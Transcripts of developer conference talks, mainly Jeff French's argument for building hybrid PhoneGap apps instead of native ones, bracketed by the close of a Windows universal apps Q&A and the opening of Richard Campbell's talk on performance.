If you really want to try out the universal Windows applications, and you also want to see how to use all the new APIs and so on, there are the universal Windows app samples, which just give you a lot of different samples that you can go through. I have them here. I'm not going to open each one of them and go through them, but you have a sample for basically any API that you might be interested in taking a look at. There are many samples on MSDN, so make sure that you take a look at them. And with that said, I was so worried that I wouldn't have time to go through everything that I was going to show that I believe I'm actually going to be able to answer questions. I believe so. So I'd gladly take some questions now if you have some. Yes? Yeah. No, it's automatic. Yeah. And it's not something that we can decide on. This is something from the user side. Yeah. Questions? Yes? Yeah, absolutely. The reason why I didn't bring up Blend now: I actually only use Blend for animations, and also sometimes when I work with behaviors, because in Visual Studio now we have more or less almost all the Blend capabilities inside the designer, because it is basically Blend built into Visual Studio. So yeah, Blend is very much supported, and everything I've shown here with the device window and navigation menu and everything, you will also find in Blend. Yeah. I have not tried that, so I actually don't have an answer to that. I wouldn't say there's any one way to go about it; it really depends on your preference. Yeah. How can you leverage Cortana's capabilities in your own applications? I have actually not tested Cortana yet, as far as I know from everything that I've seen, because I haven't been working on any project with speech since Build, but I did watch the sessions they had on it, and from what I saw the examples are still the same.
It's just an improvement on what we get out of it, but I didn't see that we had any extra access or capabilities beyond what we've had from the previous release. I can however be wrong. I have to admit that, in particular with speech, I am not 100% up to date with Cortana. Any more questions? It's a quiet crowd. All right. The first two people coming up here that are interested in programming for Windows Store applications will get a book, and if you'd like to buy the book at a discounted price, I have cards here, and a monthly site subscription with free, full, unlimited access here as well. Feel free to ping me on Twitter. I don't provide my email; I've gotten some really weird emails, so since this is recorded, I'd rather not have my email on the site, but write a comment on my blog or just tweet to me and I'll give you my email. Okay. Thank you.
Earlier this year there were many improvements to the Windows Phone and Windows Store platforms, and this session gives you an overview with plenty of demos of the changes, covering native DLL calls with brokered components and groundbreaking changes to Windows Phone (I'll demo a JS Windows Phone app using Angular.js that incorporates a cross language Windows Runtime Component written in C# shared with a Windows Store App). Of course API changes will be covered, not to mention Universal Apps and the major changes in Portable Class Libraries that somehow went unnoticed at BUILD. Besides all that we will take a brief look at side loading improvements, changes you should know about in regards to the submission and deployment process, and the future of the Store and developer portal. Throughout the session I'll recommend VS extensions that might come in handy, share samples and other resources that will guide you further. This session is intermediate and assumes previous knowledge of the platform. Come well rested, it's a dense session with a high pace.
10.5446/50547 (DOI)
Can you guys hear me okay? Yeah, good? All right. So good morning. Welcome to the first session of NDC 2014. Glad you guys made it out. My name is Jeff French. I am a mobile app developer. Been doing mobile apps exclusively for about a year now, off and on for a few years before that. So let's start by kind of finding out more about you. So how many people in this room have built a mobile app before? Okay, maybe half. Out of those, how many built a hybrid app? Okay, a few. Native app then? Okay. So how many of you are about to start a mobile project in the next six months? Okay, looking for some timely advice? Great. So we're going to go ahead and conduct this session in a little bit different fashion. I'm going to start at the end and then we'll go back through the beginning and the middle and figure out how we got to the end. So let's do that now. There you go. If what you came here to hear was someone stand on stage and tell you to choose hybrid or choose native, this is what I'm going to tell you. If that's all that you were after, great. You got time to go catch somebody else's session. If you want to know why, I'm going to tell you that. So stick around and we'll go through it. And I'll take you through, you know, my experiences in delving into hybrid app development and why I think it's the right choice. So for starters, am I a hybrid fanboy? Yeah. Have I ever built a native app? Nope. And does that make me grossly under qualified to advise you on this subject? Maybe. But no. Really, it just means that I have already kind of done a lot of this homework. I'm going to let you know my experiences in spelunking through all these Google results and sifting through all these blog posts and trying to figure out: should I invest in learning a native technology or make use of the existing web skills I already have? The upfront trade-off seems pretty obvious, right?
Because you say, well, if I've already got web skills and I can use those technologies to build a mobile app, then it's going to be better, right? But that may not be true. Now, I've gone through this kind of research cycle, I guess, a few times over the last three or four years. And every time I've come to the same conclusion, I always keep coming back to hybrid apps. And every now and then I say, yeah, you know, well, maybe, and then I go back and I start thinking about it again and I start doing the research and trying to figure out if there really is an advantage to going native, and I always come back to choosing hybrid. So TLDR, choose hybrid. So let's go back to the beginning and start by kind of defining some things. What is a native app? What are the components of a native app? You're going to find a native app is going to have a platform-specific language. You're going to be using a different language for pretty much every platform that you need to develop for. So if that's iPhone, Android, Windows phone, there you go, three languages. Three UI designs that you have to build. Three UI design languages, I guess you could call them, that you're going to have to learn. Cocoa and XAML and whatever that thing is on Android. You're going to have to go through and build out a UI for each one of these platforms that makes sense for your app. And you're going to have to build it three times, four times, however many platforms you've got to go to. And as you're building the same app to solve the same problem for your end users or provide the same value for end users on all these different platforms, when you're building a native app, do you know how much code reuse you're going to get? Zero. You're going to have to do everything on all of the platforms that you need to deploy to. You're not really going to be able to share much logic. 
I mean, yeah, you might say, well, if I'm building something that's more of a thin client and I can put the logic on the server through an API, yeah, absolutely. And that's going to be true of any mobile app you build hybrid, native, or otherwise, and really any other app. If you can centralize some of that logic into an API, that's definitely going to get you some more reuse. But on native apps, your actual device-specific code is not going to get much shared usage. So these things here, Objective-C slash Swift now, if you saw yesterday's announcement or two days ago announcement, Java, XAML, if any of those terms give you heartburn, if you have built something with XAML for Windows Phone 7 and now you suffer from post-traumatic shock syndrome, native might not be the best choice for you. OK? So let's look at the anatomy of a native app. Here's what you're going to end up having. On every one of these, in some form or another, you're going to have this stack of view that has your UI, some type of a view controller that's going to present that UI, some business logic that's underneath it. And as you can see, they're in silos. We're not sharing anything across them. We're having to solve the same problem multiple times. All right? So on here, that's your problem. OK? In each one of these, your problems are being solved multiple times. OK? Now, you're going to be challenged with trying to build a somewhat consistent UI for your users. That makes sense. If you've got users who switch from iOS to Android and they're using your app, you want them to understand how to use your app already. They shouldn't have to relearn it, just because they're on a new platform. You're going to have to have feature parity, not only in your initial development, but in your ongoing development as you continue to try to add value to your application. You've got to add it on three platforms, considering that's all of the market right there. 
But if you're doing BlackBerry, have fun with that. You're going to have to solve that same problem, every business problem, every UI problem, all the great stuff that Luke was just talking about out there with designing for good user experience on a mobile device. Well, now you've got to figure out how to replicate all of that across all the platforms that you go to. OK? So you're going to have to solve your problem n times, where n equals the number of platforms you need to deploy to. And you're also going to have to overcome multiple learning curves. Unless you were already born an expert in all three of these mobile platforms, you're going to have to go out and learn these technologies. Or you're going to have to go out in higher teams that already have these technologies under their tool belt and can be effective at building them. So what's a hybrid app? Well, one thing all hybrid apps tend to have in common is a native web view. There's a web view in every mobile SDK. They've got some way for you to display a web page. And hybrid apps take advantage of that by having a native web view that lets you present an HTML and CSS and JavaScript-based UI inside that web view. And it doesn't look like a browser. There's no Chrome around it. It's just a full page most of the time, unless you want it to have a toolbar. They're going to have a JavaScript API that's going to let you access native functionality. So when you want to get to native device capabilities, such as a camera or access to an NFC chip or GPS or the contacts on a phone, they're going to have a JavaScript-based API that's going to let you access that in a consistent manner across all the platforms that you deploy to. And as discussed, we're going to have an HTML5 and CSS-based UI. And JavaScript can be in your UI as well. And that means that if you already know how to build web pages, which quick show of hands, who knows how to build web pages? Yeah? Pretty much everybody. That's good. Congratulations. 
You already know how to build a UI for a mobile app then. Are you going to have to learn some mobile UI paradigms that make use of HTML5, of course? Maybe you already know some from building mobile web apps. But the really nice one is your code reuse. When you choose to go down the path of hybrid apps, you're going to get close to 95% to 100% of code reuse across your platforms. And that's going to skew more toward the high end of that number for most apps. Now, you're not going to get that with a native app. So let's look at the anatomy of a hybrid app. They're going to look like this. You're going to have a native web view and native API and a unified JavaScript API that goes across all those. And then you're going to have JavaScript-based app logic, and HTML and CSS-based UI sitting on top of that. So here's how that breaks down. Those top two, those are your problems. All the bottom ones are somebody else's problem now. Not yours. You're going to lean on a framework, such as PhoneGap or Senka Touch or something, where they are building out the native web view. And they are integrating the native APIs and exposing them via a common JavaScript API. And all you have to do is write one code base. Whenever you want to get a picture from the camera, you just say navigator.camera.getPicture, depending on whatever kind of framework you're using. And whether that code is running on a Windows phone or an iOS device or an Android device, it's just going to work. And you don't have to care. All those differences in the platform are nicely and neatly abstracted away. So you don't have to worry about them. Because last time I checked, unless you're actually building one of these native frameworks, the details of how to get a picture from a camera on three or four different platforms is probably not the business case that you're solving. It's probably not what your app is intended to do. 
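As a concrete sketch of that unified JavaScript API: Cordova/PhoneGap exposes the camera through `navigator.camera.getPicture(success, error, options)`. One common pattern is to wrap that callback-style call in a promise; passing the camera object in as a parameter is my own choice here (not part of the framework) so the same wrapper can also be exercised with a fake outside a device:

```javascript
// Wrap a Cordova-style camera API (getPicture(success, error, options))
// in a promise. Taking the camera as a parameter keeps the wrapper testable.
function getPhoto(camera, options) {
  return new Promise(function (resolve, reject) {
    camera.getPicture(resolve, reject, options || { quality: 50 });
  });
}

// In the real app you'd call it with the global Cordova object:
//   getPhoto(navigator.camera).then(function (imageData) { /* show it */ });
```

Whether that code runs on iOS, Android, or Windows Phone, the framework supplies the platform-specific implementation behind the same call.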
If your app's primary function is to figure out how to get a picture off of a camera, OK, yeah. Maybe it makes sense for you to write that native code. But probably not. Probably you're building some sort of a social app or maybe a line of business app. And you need to grab the user's location for something. You don't want to have to worry about how to write that on six different platforms. You just want to have one nice call that says, well, just give me the location. This is very similar in concept to something like the.NET framework. You can go ahead and write lots of Windows-based code in C or C++ that makes use of native low-level Windows APIs. Or you can use the.NET framework and be way more productive. And then you can also know that some other engineer who probably has more time and experience in optimizing native API calls in the Windows framework has optimized that and exposed it to you in a good way in the.NET framework for most of your use cases. That's the same concept with the hybrid app. You're kind of standing on the shoulders of giants by letting a whole team of other developers who work on something like, say, PhoneGap that have a lot of experience in building this native piece of the code so you don't have to. And it's also going to come back to, see how we've got JavaScript app logic up there? That means that you notice it's one big pink block across all the platforms. You have to solve your problems once. And yes, some of those are going to be solved, like we said before, at the API level up on your server. But if it's a local device application, if it's something that's offline and you don't have access to a server, it doesn't make sense to have an API, you still only have to solve your problems one time. And the same goes for your UI problems as well. When you start designing out a UI paradigm, you're going to be able to reuse that across platforms and then just tweak it ever so slightly as needed for each platform. 
There's a gray area that exists between native and hybrid. This gray area is what we would call transpiled applications. A transpiled application is something where you write code in one language and it gets transpiled down into another language. Examples of that might be something like, say, Xamarin, where you write C# and it gets transpiled down into Java or Objective-C or whatever else to run on all these different platforms. Now, in these transpiled apps, you're still going to have some of the advantages of a hybrid app, in that there are going to be native device APIs that are exposed in a common language. Hybrid apps do it with JavaScript. Some of these transpilers do it with JavaScript, like, say, Appcelerator. Some of them do it with C#, like Xamarin. You're going to have common business logic across your platforms. So once again, we're getting that nice advantage of being able to solve your business problems with one code base, one time, and have it work on all the platforms. Which is very nice, because as a developer you probably, like I do, adhere to the philosophy that, well, if I have to do something more than once, let's automate it, because I don't want to do it three times. Same thing with building a native app. Why solve the same problem three or four or five times when you can solve it once by using a better set of tooling? Now, with most of these transpiled applications, you're going to have to build a platform-specific UI. These are usually going to be in the native UI language and tooling of the platform that you are trying to target. So typically, you'll have to build out a Cocoa-based UI for iPhone, you'll have to do your Android thing, you'll have to do XAML. Now, that's not 100% true. Some of them, especially if you saw the release of Xamarin.Forms, have released a lot of nice cross-platform UI components.
But you'll probably still have to dip down into native UI stuff in order to use most transpiled mobile app frameworks. So, code reuse. Transpiled apps do get a lot of good code reuse. You're still probably going to get, on average, I'd say, about 70% to 80% code reuse by going this way. Most of your business logic is going to be there; it's mostly going to be UI code that you're not going to be able to actually reuse between the platforms. Now, that still leaves you in that area of having to solve these UI paradigms on your own, on multiple platforms. So you're still going to have to figure out how to make this work on each one of these platforms and how to plug it in to your transpiled app framework. So like I said, some examples of transpiled apps would be Xamarin and Appcelerator Titanium. I haven't built a full app with either one of these things. I've maybe done about Hello World on each one. And they definitely have some potential. But again, I've always fallen back to doing a straight-up hybrid app with something like PhoneGap. So when should you choose native? I've spent this whole time up until now telling you, well, you shouldn't, you should just choose hybrid, right? But that's not always going to be the case. There are times where a native app is the way to go. One of those times is when you only care about one platform. If all you care about is having your app on Android, then whatever, just build it on Android. Or if your app is highly dependent on a feature that only exists on one platform. For a long time, NFC was only on Android, and if you were building some sort of a mobile wallet app that used NFC for payment or something like that, OK, build it on Android. There was no reason to go to iOS or Windows Phone at that time.
Or, the big one, when your app uses heavy 3D rendering. If you're building a game or something that's going to have a really, really intense 3D UI, you're probably going to get a lot better performance by going native with that. But the caveat is, none of those reasons means that you have to choose native. You can do all of those things with a hybrid app. I've shipped many hybrid apps that are only on iOS, but it was faster and easier and cheaper for me to build them using PhoneGap and some other UI frameworks and ship them. And now if the client comes back to me and says, oh man, we've got to go Android, I say, OK, cool. We can do that tomorrow. Just got to run a build script. We're done. And they go, oh wow, that's cool. 3D rendering: you can do a lot in the browsers and web views that are available today. Most of them have OpenGL, and you can build a lot of really intense 3D games using nothing but JavaScript. You can also do this in transpiled apps. I talked to a guy who had used, I think, Xamarin, and built a fully 3D UI. And he didn't care about having to redo his UI on every platform, because he wasn't making use of any native stuff anyway; it was all his own UI. So he was able to reuse one set of UI components across all the platforms as well, because of the way he had to build it. So why is hybrid good for the 95% use case? Most of the time, you're going to find that a hybrid will probably suit your needs. A lot of people are building line-of-business apps, which end up being lists. You don't need a native app for that. You can do nice, rich UI in a hybrid app as well. So hybrid apps are good because they're going to have native functionality available to them via plugins. If there is something that you can't do in HTML and CSS, something that's not available to you, you can write a plugin for it.
But even better than that, most of these frameworks already have big plugin ecosystems where other people have already contributed plugins that will probably meet your needs, or at least serve as a good starting point for writing your own plugin. Some examples of that would be things like barcode scanners, GPS, contacts, camera, NFC, Bluetooth. There are tons and tons: Facebook and Twitter integration for authentication, being able to build SMS text messages in the device's native format and actually send them out. There are tons and tons and tons of plugins out there that will give you the native access you need. And even if you have to write your own plugin, you're now only having to write and maintain this much platform-specific code on each platform, instead of 100%, instead of the whole thing. The other reason that they're great is that there are a lot of frameworks out there to help you build good, close-to-native or fully native-looking UIs on each platform, and also give you a lot of the same native behaviors people expect on your platforms. A few examples of this are Ionic, Sencha Touch, and Kendo UI. Some of these take different approaches. I've been using Ionic to build a lot of apps lately, and it's been really, really nice. It's heavily integrated with AngularJS, and single-page apps are great for building mobile apps. So Ionic gives you a lot of cool stuff, such as behaviors, in that they've got AngularJS directives to build out a list that automatically has swipe to edit and delete, and has all those native UI paradigms that your users are already accustomed to, available to you without you having to write all that extra code to figure out how to do it. And it's going to work on all these multiple platforms. And then, because it's just CSS and HTML that's used to style the UI, you can tweak it and make it look right for your brand and match what your users are going to expect. OK? PhoneGap has always been my hybrid platform of choice.
And they have a ton of plugins. Now, a PhoneGap plugin, and most hybrid app plugins, are going to consist of the same thing. You're going to have native code written in the platform that you are developing for: Objective-C or Swift for iOS, Java for Android, C# for Windows Phone. And on top of that, you are going to expose a JavaScript API for your plugin, which then gets exposed through that common JavaScript API that we saw on the slide before. So this lets you build out a scenario where you only have to write, like I said, a little bit of code for a given platform and still be able to access full native functionality in that area, which is way better than writing it for every platform. So if any of you have already been doing any research into hybrid versus native, you've surely come across a ton of stuff on the internet about how hybrid apps don't perform as well as native apps. This is one of the first things that I came across when I started looking into it. I said, oh, that seems too good to be true. And sure enough, I found a whole lot of blog posts telling me, yeah, it is too good to be true, the hybrid apps don't perform well. Well, I think you're going to find, if you go and look at that, that most of it is based on hybrid technologies that existed around 2010, when they kind of started really coming into popularity. They weren't that great. Like a lot of software, they didn't come out of the gate killing it. They took some time to iterate and figure out the best way to do things. And I can tell you that with the hybrid solutions that are available today, and this is not a statistic that I have a benchmark on, but in 90% to 95% of the use cases, they perform just as well as native apps.
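The plugin shape described above, a thin JavaScript API in front of per-platform native code, can be sketched roughly like this. To keep the sketch runnable, the cordova.exec bridge is mocked here, and the BarcodeScanner service name and its result shape are purely illustrative; real plugins route through the actual Cordova/PhoneGap bridge.

```javascript
// Stand-in for the real bridge. In a device build, cordova.exec hands
// the call to the Objective-C / Java / C# plugin implementation; this
// mock just echoes back a fake scan result so the API shape is visible.
const cordova = {
  exec(success, error, service, action, args) {
    success({ text: "1234567890", format: "EAN_13" });
  },
};

// The plugin's public JavaScript API: one thin function per native
// action. App code only ever sees this, never the per-platform code.
const barcodeScanner = {
  scan(onSuccess, onError) {
    cordova.exec(onSuccess, onError, "BarcodeScanner", "scan", []);
  },
};
```

The native half still has to be written once per platform, but it stays small, and everything above the bridge is shared.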
So when you are going out and conducting your own research on this topic, please make sure you check the dates on those blog posts and really kind of go investigate the frameworks that you're looking at and figure out, well, have these people made any progress in the last four years? I sure hope they have. Now, you're also going to come across the Facebook story. Facebook, very famously a couple of years ago, ditched their HTML5 apps and went to native apps. And I even saw a quote from Mark Zuckerberg that said that betting the farm on HTML5 was one of the worst strategic decisions that the company ever made. Maybe it was just feeling pressure from the IPO. I don't know. But I will say this, should you do the same because Facebook did? No. I've done a lot of looking into that because it was a really big driver for me when I first started looking at hybrid apps and saw that Facebook was ditching their hybrid web view-based application to go native. I said, oh, man, if it's not good enough for Facebook, it's probably not good enough for me either. Well, first thing is then I remembered, oh, yeah, I don't have Facebook's problems yet. One day I'll have billions of users on my app and then I'll have Facebook-level problems. Today I don't. Then I came to the realization, if I built a hybrid app and got to Facebook scale, hopefully I would be making enough money that I could hire teams of engineers on each one of these platforms to build me native apps, just like Facebook did. If not, then maybe there's more of a problem with my business model. Maybe I have done something wrong upfront that caused this problem. Now, I don't know a whole lot about Facebook's actual implementation, but from what I've read and what I gathered, I was able to draw some pretty interesting conclusions. Remember this slide? Remember how I said that the things at the top are your problem and the things on the bottom are somebody else's problem? 
Well, this rule only applies if you actually choose a mobile framework, like, say, PhoneGap or Sencha Touch, where other engineers are building the native components and giving you a place to plug in your HTML and CSS. Now, from everything I've read on the Facebook situation, they didn't take this approach. They decided they would build their own native container with a web view to display their HTML stuff in. If you're going to go that far, you may as well build a native app, because now you are in charge of all of the native code that displays your web view, and of making sure that it's patched for security and that it's performing well and that you're keeping up on all the SDKs. You've already taken on the overhead of native app development at that point. You've already had to learn the language. You're probably not getting a whole lot of gains out of doing a hybrid app if you are building your own web view on each platform. Now, the other thing with regards to our performance myth: I will tell you right now, having never even built a native app, that it's just as easy to write crappy code in a native language as it is to write crappy code in JavaScript. If anything, it's easier. In fact, if you are an experienced web or JavaScript developer and have never touched a native language before, I would say it's probably even easier to write crappy code in a language that you're new to. I mean, how many people here have spent a lot of time learning how to optimize your web code? How many people have learned how to optimize for the platforms that you build for? If you write .NET code in C#, you've probably learned a lot over your years of experience. That's why we look for developers that have five-plus years of experience for things: because we know that they've already learned, or hopefully have learned, how to write better code in that language and how to get more performance out of it.
So if you have already spent a lot of time, especially if you're a web developer who has already spent a lot of time really good at optimizing your HTML and doing smarter and more efficient DOM manipulation and writing good effective CSS selectors and writing good high-performance JavaScript, you're probably going to be able to write a good, well-performing hybrid application using those skills. Those skills are going to transfer right over into your hybrid app development. However, if you have never written Objective-C before and you file new in Xcode and start building out a native app, there's a very good chance that you're going to do a lot of things wrong or do a lot of things poorly. It's the old saying that the first step to getting good at something is sucking at something. Well, oftentimes in mobile app development, time to market is critical. If you can get out there first with your idea, you're going to gain some mind share and some market share. Well, if you've got to go build something really, really fast on three brand new platforms that you've never touched before, there's a good chance you're going to put out crap. But if you can leverage existing skills that you've already spent time developing, you've given yourself a much better chance of putting out a good, well-performing application. So our conclusion here is that you should choose hybrid. I told you I was a fanboy. Now, as we've said, there's a lot of reasons that you might choose something other than hybrid. But if you're going to go down that path, I really, really want for you guys to go down that path with your eyes open. Understand the caveats, because it's easy when you're jumping out into a new language to find a lot of let's get started. Here we go. Quick start tutorial on Android development. And it's going to have you build Hello World. And you're going to say, OK, that wasn't too bad. 
I mean, I had to struggle through some tool installations and some configurations and maybe a little bit of language-learning stuff. But I got Hello World out the door in a day or less, so it can't be that hard. Just stop to remember the first time that you wrote Hello World in your favorite language. You wrote it, and you've probably learned a lot since that first Hello World. So don't throw that out the door, especially if your language of choice is already JavaScript. Don't throw away that skill set just because some random blog post from 2011 says that Facebook had a problem with a web view. That's not really a good reason to go that route. So at this time, I'd like to go ahead and just open it up for questions. There are generally a lot of questions at the end of this talk. Go ahead. OK, great. So the question is, out of the stuff I've mentioned, what kind of concrete examples can I give of stuff that I've used? As I said earlier, every time I've looked at stuff, PhoneGap has been my tool of choice for building these hybrid applications, and it's the only thing that I've actually shipped something to the app store in. And it's been my experience, especially since PhoneGap went from 2.9 into the 3.0 era, that they made huge, huge gains in the way that they handle their framework and performance, and it's gotten us a lot closer to a native-app-type experience. As far as Xamarin, like I said, I haven't done anything beyond, say, Hello World using Xamarin or Appcelerator Titanium. So I can tell you that my experience with those, in writing Hello World, was such that I felt like I wasn't going to get enough gains out of investing in learning their system. With PhoneGap specifically, I found that I didn't have to learn very much new stuff beyond HTML and CSS and JavaScript. It was very much about building a web app that could run on a device.
But I don't have a lot of good negative experiences to tell you about, because I don't waste my time on negative stuff. When I feel like there's nothing there, I bail out. But excellent question. Did I answer that? OK, great. So, any more questions? Yes? What are some high-profile examples? Excellent, excellent question. I actually had a bullet point on here, and I forgot to bring it up. So with PhoneGap, I was just looking this morning, and a couple that I found as high-profile examples: the BBC in the UK did an Olympics app for the Summer Olympics. Or no, maybe it was just recently, the Winter Olympics, whichever one. I don't know, I'm not in the UK, so I didn't get to use the app. However, it was featured on PhoneGap's featured-app page to show that the BBC had built this thing. And it looked beautiful. And it was available on iOS, Android, and BlackBerry; those were the platforms they decided were important to them. And this app had 24 live streaming feeds of the Olympics. It had social integration, it had medal rankings, it had a page for every sport, a page for every country where you could go see all this stuff. And obviously, if it's put out by the BBC to allow people to use it, I don't know what their usage numbers were, but I've got to guess there was a whole lot of usage, a whole lot of simultaneous usage. And again, the thing to remember on mobile apps is that simultaneous usage doesn't really amount to anything except for server load. Everybody's using their own device. But another one that I see: has anybody here ever used Untappd? No? Craft beer drinkers? No? OK. Well, it's big in the States anyway. And it's another one that is available on iOS, Android, and Windows Phone, and has great experiences. And to be honest with you, I've used the app for probably a year now, and until I looked it up and noticed it on the PhoneGap page, I had no idea it was a hybrid app.
Like, I've been using it, not every day, but a lot over the last year, and had no idea that it was a PhoneGap-based application. And I was like, oh, OK, cool. Well, that's good to know. Now there are others. One of the ones that gets pointed out a lot as an example of hybrid apps, but is not PhoneGap to my knowledge, is Instagram. Now, Instagram is still, as far as I can guess, in the same boat that Facebook was with their HTML implementation. I believe that they have a native app with their own web view, and so they load up native navigation, and then the actual pictures and posts that you view are loaded in a web view. Now, again, they have taken on the task of writing, essentially, a native app. Probably the only reason they show things in a web view is because it's a real easy way to load a bunch of pictures and text into your app, because those are coming live from the web. Which is actually a really good, important point to bring up. When you are building a hybrid app, especially with something like PhoneGap, a common misunderstanding or pitfall that people get into in the beginning is they say, well, I've already got a mobile website, so I can just take PhoneGap and create this little container that will load up the mobile website I've already got on my server, and it's just going to work. No, it's probably not. PhoneGap is going to require at least the first bit of HTML to be on the device. And you're going to get the best experience by serving all of your JavaScript and HTML and CSS from the device itself. If every time a user clicks on something in your app, it has to make a web request, just like they're in their browser, it's going to feel like a website, not a native app. And that's one of the areas where, when you go down that path, it creates a hybrid app that doesn't feel native.
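Serving assets from the device doesn't mean they can never change: a hybrid app can still check a server at startup and refresh its local HTML, CSS, and JavaScript. A minimal sketch of that decision, assuming hypothetical dotted version strings and leaving the actual download step out:

```javascript
// Compare the locally stored asset version against one fetched from the
// server, and decide whether fresh assets should be downloaded. The
// version format ("1.2.0"-style) is an assumption for this sketch.
function needsAssetUpdate(localVersion, remoteVersion) {
  const a = localVersion.split(".").map(Number);
  const b = remoteVersion.split(".").map(Number);
  for (let i = 0; i < Math.max(a.length, b.length); i++) {
    const x = a[i] || 0;
    const y = b[i] || 0;
    if (x !== y) return y > x; // update only if the server is ahead
  }
  return false; // identical versions: nothing to do
}
```

On startup the app would fetch the remote version, call this check, and only then pull down new assets and reload its web view.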
Now, one of the advantages of a hybrid app: we've all heard the horror stories about it taking two and three weeks to get something approved on the Apple App Store, and you've still got to get approval to do it and everything. A hybrid app can actually give you a little bit of a way around that, in that you can ship one version of your application, but on startup, you're free to just go download fresh HTML, CSS, and JavaScript from your server. So you can build what amounts to a local application, but on startup, you can say, well, let's just go check and see if we've got any updated JavaScript. Maybe you fixed a bug, and instead of having to submit to the app store, you just ship the JavaScript file up there, and your application automatically says, hey, let me go grab the latest assets, and brings that down and uses it locally. And now you've just shipped an update to your app and fixed a bug that was plaguing your users, without having to wait for Apple to approve it or anything like that. More questions? Sorry, these spotlights are hard to see. Yes? OK, yeah, great question. So the question is, with all the different screen sizes and resolutions and portrait versus landscape and rotation, is that something that's better addressed with platform-specific UI or with a hybrid solution using CSS? I very much think CSS, especially with CSS3. Your advantage in building a mobile app is that even the worst mobile browsers are better than IE8. So you get to use CSS3 and media queries and really smart selectors, so you can actually customize your UI to handle all of those different screen resolutions, and the rotation between them, very, very well by writing CSS. Now, if you don't already have a good, strong responsive design background, yeah, you're going to have to learn it. But which do you feel is a more worthwhile investment?
Learning how to solve the same screen resolution and UI problems on two or three platforms, or learning how to solve them using CSS, which, hey, also applies to the web, where a lot of stuff goes on? So to answer your question, yes, I think that those are very well addressed in hybrid apps by simply using CSS and JavaScript. One of the frameworks I mentioned earlier, Ionic, does some really nice stuff on startup, whereby it does platform detection, and it slaps CSS classes onto the body tag of your HTML page that say things like platform-ios, platform-android. And it even assigns grades to these platforms, grades A through D, based on the capabilities of the hardware. So you can very, very easily, with just CSS, change the layout of your application for a specific platform, maybe disable animations on a lower-grade device that's not going to handle them very well. You can do all of that very, very easily by utilizing a lot of these tools. And it actually brings up another great point, in that one of the ways in which you can really get more leverage out of your hybrid app is by also making it a web app. Actually, I think Luke was just talking about this in the keynote, that there are a lot of companies that have both a native app and a mobile web experience, and they end up being complementary. When you build, especially, a PhoneGap app, you're building a mobile web app that happens to run on the device. And if you take a little bit of an intelligent approach to it up front, by doing a little bit of detection to figure out, hey, am I running on the device, or am I running in a website, you can present the same UI. I've actually done this before with an app that I shipped to the app store, and we had a mobile web version. It was one code base. And so when the users landed on this mobile version of a website, they got the exact same experience as they did in our app that was on the app store.
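The "am I running on the device, or am I running in a website?" detection just described can be sketched like this. In a Cordova/PhoneGap build, window.cordova typically exists and the page is usually served from file://; on the mobile web, neither is true. The exact signals vary by framework version, so treat this as an illustration rather than a definitive test (the win parameter is injected so the sketch can run outside a browser).

```javascript
// Heuristic check for a hybrid container vs. the plain mobile web.
function runningInHybridContainer(win) {
  if (win.cordova || win.PhoneGap) return true; // bridge object present
  const protocol = (win.location && win.location.protocol) || "";
  return /^(file|app):/.test(protocol); // locally served assets
}

// One code base, two behaviors: pick the device feature when it is
// available, otherwise fall back to a plain web interaction.
function chooseInput(win) {
  return runningInHybridContainer(win) ? "device-feature" : "web-fallback";
}
```

With a check like this, the same UI can quietly swap a native capability for a web-friendly alternative when it runs in the browser.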
The only difference being that I had a barcode scanner in this app. Well, I can't do a barcode scanner from the web. So all I did was check to see, hey, am I in PhoneGap, or am I in the web? If I'm in the web, then whenever they clicked that button that would normally bring up a barcode scanner, it said, well, just type in what you're looking for. And maybe you could do it without typing, like Luke said; you could do something more intelligent. But the point being, now you can not only go to all these multiple platforms, but you can also go to the web. Because as you get into native app development, you're going to find that one of the challenges is that now you're expecting your users to install an app. I work for a company that makes a shopping app. Or, we used to make a shopping app; now we only make a shopping mobile site. Because the idea of getting a customer to walk into a store and download a third-party app in order to do some additional shopping was too much of a bridge to cross. But I didn't lose any time, because I built all this in PhoneGap, and I was able to take that code base that I was already using for mobile web and just ditch the native app side of it and only use it as mobile web. We didn't have to backtrack for months and months and months to recreate this as a mobile website. So it's one more advantage of a hybrid app: you already have a mobile website available. Yes, sir? How do you handle offline functionality in a hybrid app? Do you use local storage? That's a great question. So, how do you handle offline in, say, a PhoneGap app? There are a lot of ways. Yes, local storage is my favorite. I typically am using just HTML5 local storage to do a lot of things. There are also plugins that you can use, such as Couchbase. If anybody's used Couchbase before, they now have a mobile plugin that has a sync back end built into it. So it will automatically do some stuff, so that you've got Couchbase on your server.
You've got a Couchbase plugin in your mobile app. And whenever you fire up your mobile app, it kicks off a sync in the background and starts pulling down background data. And then it will do the same thing whenever you lose a connection: as you continue just interacting with your local app, whenever a connection is available again, it'll sync it back up to the server. And you can also just build your own solutions for this, in that PhoneGap, for example, raises events that say network connected, network disconnected. So you can catch those events and you can start handling them in your code to say, oh, OK, I need to switch this into offline mode, or I need to switch back into online mode and sync any offline data that happened. So yeah, offline is absolutely something that you can handle very well in a hybrid app, just like you can in a native app. More questions? No? All right. Well then, my name is Jeff French. You can follow me on Twitter at Jeff underscore French, or check out my blog, geekindulgence.com. And if you have any additional questions that come up after this, feel free to hit me up in one of those two places. Thank you very much for your time today. Thank you.
In today’s mobile-first world almost every company has realized the need to connect with consumers on mobile devices. Now you, the developer, must figure out how to build it! Objective-C, Java, Xamarin, PhoneGap, Appcelerator, Icenium: there are so many ways to build a mobile app today, how do you choose? In this session I will cover the pros and cons of native app development and HTML5 hybrid app development to help you make the right choice based on the needs of YOUR app.
10.5446/50549 (DOI)
Okay, we got it. We've got an hour to talk about this. My name is Richard Campbell. That's my Twitter handle, Rich Campbell, and it's probably the easiest way to reach me. I try to respond to everyone that's interested in this subject, and interested in any subject, because I'm interested in a lot of things. I talk pretty much for a living, it appears, these days. If you haven't run across me before: I'm older than I look. My first line of code, in 1977, was 10 PRINT "HELLO WORLD", which was followed by my second line of code, 20 GOTO 10. And that was on a TRS-80 Model I with 4K of RAM and a cassette tape player for storage, running a version of BASIC not built by Microsoft; it was a Dartmouth BASIC, and it had three error messages: WHAT?, HOW?, and SORRY. Which I still think are some of the best error messages ever made, because they're honest. You know, what's "object not found"? But SORRY? Anyway, being an old guy and having done lots of different development in a lot of different languages, I've also spent a lot of time in hardware, because back then you didn't have a choice. So I've always built my own gear, and I grew up as networking grew up; I've drilled thick Ethernet and pulled ARCNET. And so as I became a professional in this industry that doesn't really have professional designations, I fell into performance work, because I'm comfortable with software, I know my way around hardware, and I understand networking; and when you try to make stuff go fast, all the pieces have to come together. And being able to fit between those bits and understand the different pieces, that paid the best. You know, we work so many hours 